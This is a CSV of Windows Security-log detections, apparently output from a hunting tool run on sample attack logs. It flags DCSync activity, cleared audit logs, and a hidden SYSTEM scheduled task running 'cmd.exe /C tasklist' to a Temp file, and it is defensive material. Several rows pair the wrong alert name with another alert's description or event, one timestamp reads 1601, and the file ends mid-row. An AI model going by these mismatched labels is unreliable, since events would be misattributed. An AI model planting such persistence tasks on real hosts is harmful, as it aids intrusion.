O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Audit log cleared,1557594610.60807,2020-09-02T15:47:48.570502+04:00,,Audit,Critical,"User Name : ( IEUser ) with process : ( C:\Python27\python.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18196 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x4f0 + C:\Python27\python.exe + %%1938 + 0x12c + + +",01566s-win16-ir.threebeesco.com,Security +Process running in Unusual location,1599047268.570502,2019-05-11T21:10:10.608070+04:00,,Threat,High,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 2171289 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x38a14 + + +",IEWIN7,Security +Dcsync Attack detected,1553549341.035686,2019-03-26T01:29:01.035686+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242605 + + + + + Security + DC1.insecurebank.local + + + + + 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Audit log cleared,1557594610.342445,2019-05-11T21:10:10.342445+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 18195 + + + + + Security + IEWIN7 + + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1371b + + +",IEWIN7,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242604 + + + + + Security + DC1.insecurebank.local + + + + + 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242603 + + + + + Security + DC1.insecurebank.local + + + + + 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Audit log cleared,1552907189.911579,2019-03-18T15:06:29.911579+04:00,,Audit,Critical,schedule task created by user,4698," + + + + + 4698 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 566836 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2d2 + \CYAlyNSS + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <Triggers> + <CalendarTrigger> + <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="LocalSystem"> + <UserId>S-1-5-18</UserId> + <RunLevel>HighestAvailable</RunLevel> + <LogonType>InteractiveToken</LogonType> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>P3D</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="LocalSystem"> + <Exec> + <Command>cmd.exe</Command> + <Arguments>/C tasklist &gt; %windir%\Temp\CYAlyNSS.tmp 2&gt;&amp;1</Arguments> + </Exec> + </Actions> +</Task> + +",PC01.example.corp,Security +schedule task created,1552953724.335561,2019-03-19T04:02:04.335561+04:00,,Audit,High,Audit log cleared by user ( user01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 432901 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + + +",WIN-77LTAPHIQ1R.example.corp,Security +network share object was added,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,network share object was added,5142," + + + + + 5142 + 0 + 0 + 12808 + 0 + 0x8020000000000000 + + + 6273 + + + + + Security + PC04.example.corp + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC04 + 0x128a9 + \\*\PRINT + c:\windows\system32 + +",PC04.example.corp,Security +Audit log cleared,1552953724.179623,2019-03-19T04:02:04.179623+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 566821 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + administrator + EXAMPLE + 0x4fd77 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1552851030.324836,2019-03-17T23:30:30.324836+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 6272 + + + + + Security + PC04.example.corp + + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC04 + 0x128a9 + + +",PC04.example.corp,Security +Audit log cleared,1552951423.570212,2019-03-19T03:23:43.570212+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," + 